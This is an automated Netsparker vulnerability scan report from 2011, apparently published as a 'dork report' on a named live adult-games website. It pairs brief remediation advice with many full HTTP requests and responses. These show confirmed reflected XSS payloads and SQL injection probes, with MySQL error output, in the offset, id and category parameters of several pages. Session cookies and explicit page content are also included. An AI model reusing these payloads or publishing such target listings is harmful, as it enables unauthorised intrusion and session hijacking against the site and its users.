XSS, SQL Injection DORK Report for www.lessonofpassion.com


Netsparker - Scan Report Summary
TARGET URL: http://www.lessonofpassion.com/user.php?type=...
SCAN DATE: 4/17/2011 3:18:45 PM
REPORT DATE: 4/17/2011 3:28:10 PM
SCAN DURATION: 00:07:44

33 identified, 24 confirmed, 4 critical, 1 informational

GHDB, DORK Tests
PROFILE: Previous Settings
ENABLED ENGINES: Blind SQL Injection, Boolean SQL Injection, Command Injection, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

CRITICAL: 12 %
IMPORTANT: 70 %
LOW: 15 %
INFORMATION: 3 %
[High Possibility] SQL Injection

4 TOTAL, CRITICAL
SQL Injection occurs when data input, for example by a user, is interpreted by the backend database as a SQL command rather than as normal data. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection here, it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, so that we can address it next time and give you a more precise result.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attacks:

Actions to Take

  1. See the remedy for the solution.
  2. If you are not using a database access layer (DAL) within the architecture, consider its benefits and implement one if appropriate. As a minimum, the use of a DAL will help centralize the issue and its resolution. You can also use an ORM (object-relational mapping). Most ORM systems use parameterized queries, and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Monitor and review web server logs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

/games_best.php

http://www.lessonofpassion.com/games_best.php?offset=%2527&id=3&category=3

Parameters

Parameter Type Value
offset GET %27
id GET 3
category GET 3

Request

GET /games_best.php?offset=%2527&id=3&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_best.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 137
Connection: close
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27,20' at line 1
/games_dev.php

http://www.lessonofpassion.com/games_dev.php?offset=%2527&id=3&category=mnf

Parameters

Parameter Type Value
offset GET %27
id GET 3
category GET mnf

Request

GET /games_dev.php?offset=%2527&id=3&category=mnf HTTP/1.1
Referer: http://www.lessonofpassion.com/games_dev.php?type=category&category=mnf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 137
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27,20' at line 1
/games_new.php

http://www.lessonofpassion.com/games_new.php?offset=%2527&id=3&category=3

Parameters

Parameter Type Value
offset GET %27
id GET 3
category GET 3

Request

GET /games_new.php?offset=%2527&id=3&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 137
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27,20' at line 1
/games_category.php

http://www.lessonofpassion.com/games_category.php?offset=%2527&id=3&category=adventure

Parameters

Parameter Type Value
offset GET %27
id GET 3
category GET adventure

Request

GET /games_category.php?offset=%2527&id=3&category=adventure HTTP/1.1
Referer: http://www.lessonofpassion.com/games_category.php?type=category&category=adventure
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=23dbc668a5388626dfb199f6b4ffe058
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:01:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 137
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27,20' at line 1
Cross-site Scripting

22 TOTAL, IMPORTANT, 21 CONFIRMED
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by rewriting the HTML on the fly to steal the user's credentials. This happens because input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might target an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list need only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting libraries are good examples.

/games_category.php CONFIRMED

http://www.lessonofpassion.com/games_category.php?type=category&category='%22--%3E%3C/style%3E%3C/sc..

Parameters

Parameter Type Value
type GET category
category GET '"--></style></script><script>alert(0x000146)</script>

Request

GET /games_category.php?type=category&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000146)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2172
Content-Type: text/html


/games_best.php CONFIRMED

http://www.lessonofpassion.com/games_best.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter Type Value
offset GET '"--></style></script><script>alert(0x000185)</script>
id GET 3
category GET 3

Request

GET /games_best.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000185)%3C/script%3E&id=3&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_best.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 176
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x000185)</script>,20' at line 1
/games_best.php CONFIRMED

http://www.lessonofpassion.com/games_best.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter Type Value
offset GET 20
id GET '"--></style></script><script>alert(0x000190)</script>
category GET 3

Request

GET /games_best.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000190)%3C/script%3E&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_best.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 3236
Content-Type: text/html


/games_dev.php CONFIRMED

http://www.lessonofpassion.com/games_dev.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
offset GET '"--></style></script><script>alert(0x00019D)</script>
id GET 3
category GET mnf

Request

GET /games_dev.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019D)%3C/script%3E&id=3&category=mnf HTTP/1.1
Referer: http://www.lessonofpassion.com/games_dev.php?type=category&category=mnf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 175
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x00019D)</script>,20' at line 1
/games_best.php CONFIRMED

http://www.lessonofpassion.com/games_best.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/scrip..

Parameters

Parameter Type Value
offset GET 20
id GET 3
category GET '"--></style></script><script>alert(0x00019F)</script>

Request

GET /games_best.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019F)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/games_best.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 3232
Content-Type: text/html


- /games_dev.php

/games_dev.php CONFIRMED

http://www.lessonofpassion.com/games_dev.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscrip..

Parameters

Parameter Type Value
offset GET 20
id GET '"--></style></script><script>alert(0x0001A1)</script>
category GET mnf

Request

GET /games_dev.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A1)%3C/script%3E&category=mnf HTTP/1.1
Referer: http://www.lessonofpassion.com/games_dev.php?type=category&category=mnf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2598
Content-Type: text/html


- /games_new.php

/games_new.php CONFIRMED

http://www.lessonofpassion.com/games_new.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
offset GET '"--></style></script><script>alert(0x0001A2)</script>
id GET 3
category GET 3

Request

GET /games_new.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A2)%3C/script%3E&id=3&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 174
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x0001A2)</script>,20' at line 1
- /games_dev.php

/games_dev.php CONFIRMED

http://www.lessonofpassion.com/games_dev.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script..

Parameters

Parameter Type Value
offset GET 20
id GET 3
category GET '"--></style></script><script>alert(0x0001A3)</script>

Request

GET /games_dev.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A3)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/games_dev.php?type=category&category=mnf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2211
Content-Type: text/html


- /games_new.php

/games_new.php CONFIRMED

http://www.lessonofpassion.com/games_new.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscrip..

Parameters

Parameter Type Value
offset GET 20
id GET '"--></style></script><script>alert(0x0001A4)</script>
category GET 3

Request

GET /games_new.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A4)%3C/script%3E&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 3223
Content-Type: text/html


Episode 1</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Poker with Nicole" title="Poker with Nicole"><img src="imago/pokernikole.jpg" class = "game" width="157" height="112" ><span class = "def">Poker with Nicole</span><span class = "em">Logical</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Seductive RPG" title="Seductive RPG"><img src="imago/sedrpg.jpg" class = "game" width="157" height="112" ><span class = "def">Seductive RPG</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Jordan 500: HCC" title="Jordan 500: HCC"><img src="imago/j500.jpg" class = "game" width="157" height="112" ><span class = "def">Jordan 500: HCC</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Miami Holidays" title="Miami Holidays"><img src="imago/mhol.jpg" class = "game" width="157" height="112" ><span class = "def">Miami Holidays</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=High school romance" title="High school romance"><img src="imago/highschoolromance.jpg" class = "game" width="157" height="112" ><span class = "def">High school romance</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Sweet neighbor" title="Sweet neighbor"><img src="imago/sweetneighbour.jpg" class = "game" width="157" height="112" ><span class = "def">Sweet neighbor</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny teacher" title="Horny teacher"><img src="imago/hornyteacher.jpg" class = 
"game" width="157" height="112" ><span class = "def">Horny teacher</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Meet`N`Fuck Star Mission" title="Meet`N`Fuck Star Mission"><img src="imago/star.jpg" class = "game" width="157" height="112" ><span class = "def">Meet`N`Fuck Star Mission</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny Maid" title="Horny Maid"><img src="imago/hornymaid.jpg" class = "game" width="157" height="112" ><span class = "def">Horny Maid</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Olympic Adventures" title="Olympic Adventures"><img src="imago/olympic.jpg" class = "game" width="157" height="112" ><span class = "def">Olympic Adventures</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=SpiderMan Black Cat Felatio" title="SpiderMan Black Cat Felatio"><img src="imago/spiderman.jpg" class = "game" width="157" height="112" ><span class = "def">SpiderMan Black Cat Felatio</span><span class = "em">Arcade</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=I love Laura" title="I love Laura"><img src="imago/illovelaura.jpg" class = "game" width="157" height="112" ><span class = "def">I love Laura</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=High Tail Hall" title="High Tail Hall"><img src="imago/fur.jpg" class = "game" width="157" height="112" ><span class = "def">High Tail Hall</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <center><div class="clearfix"> </div><center><a 
href="?offset=0&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3"><strong>PREVIOUS</strong></a> &nbsp; <a href="?offset=0&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >1</a> &nbsp; <strong>2</strong>&nbsp; <a href="?offset=40&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >3</a> &nbsp; <a href="?offset=60&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >4</a> &nbsp; <a href="?offset=80&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >5</a> &nbsp; <a href="?offset=100&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >6</a> &nbsp; <a href="?offset=120&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >7</a> &nbsp; <a href="?offset=140&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >8</a> &nbsp; <a href="?offset=40&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3"><strong>NEXT</strong></a><p> </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. 
</div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><span class = "absi"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","380","height","220","src", "comlink?username=&quest=", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","comlink?username=&quest=" , "menu", "false", "z-index","-1","wmode", "transparent"); //end AC code</script></span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /games_new.php

/games_new.php CONFIRMED

http://www.lessonofpassion.com/games_new.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script..

Parameters

Parameter Type Value
offset GET 20
id GET 3
category GET '"--></style></script><script>alert(0x0001A6)</script>

Request

GET /games_new.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A6)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/games_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 3223
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - \'\"--></style></script><script>netsparker(0x0001A6)</script> erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div 
class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://outcastacademy.com/index.php?targeo=lopvert" target = "_blank"><img src="lopsalesforce/outcastacademy_vert_160x600.jpg" 
border="0"></a></center></div><div id="sitecontent"> <div class="big">New games</div> <div id="glinks"> <p><a href="lop_games.php?mygame=Orihime Music" title="Orihime Music"><img src="imago/orihime.jpg" class = "game" width="157" height="112" ><span class = "def">Orihime Music</span><span class = "em">Arcade</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Flame of the lust" title="Flame of the lust"><img src="imago/fotl.jpg" class = "game" width="157" height="112" ><span class = "def">Flame of the lust</span><span class = "em">Logical</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Detective Dick" title="Detective Dick"><img src="imago/dd.jpg" class = "game" width="157" height="112" ><span class = "def">Detective Dick</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Kikis Tittes" title="Kikis Tittes"><img src="imago/kiki.jpg" class = "game" width="157" height="112" ><span class = "def">Kikis Tittes</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Kim Possible Blowjob" title="Kim Possible Blowjob"><img src="imago/kimbj.jpg" class = "game" width="157" height="112" ><span class = "def">Kim Possible Blowjob</span><span class = "em">Arcade</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Seductive RPG: Swim team" title="Seductive RPG: Swim team"><img src="imago/srpg-st.jpg" class = "game" width="157" height="112" ><span class = "def">Seductive RPG: Swim team</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Venona Project: Episode 1" title="Venona Project: Episode 1"><img src="imago/venona.jpg" class = "game" 
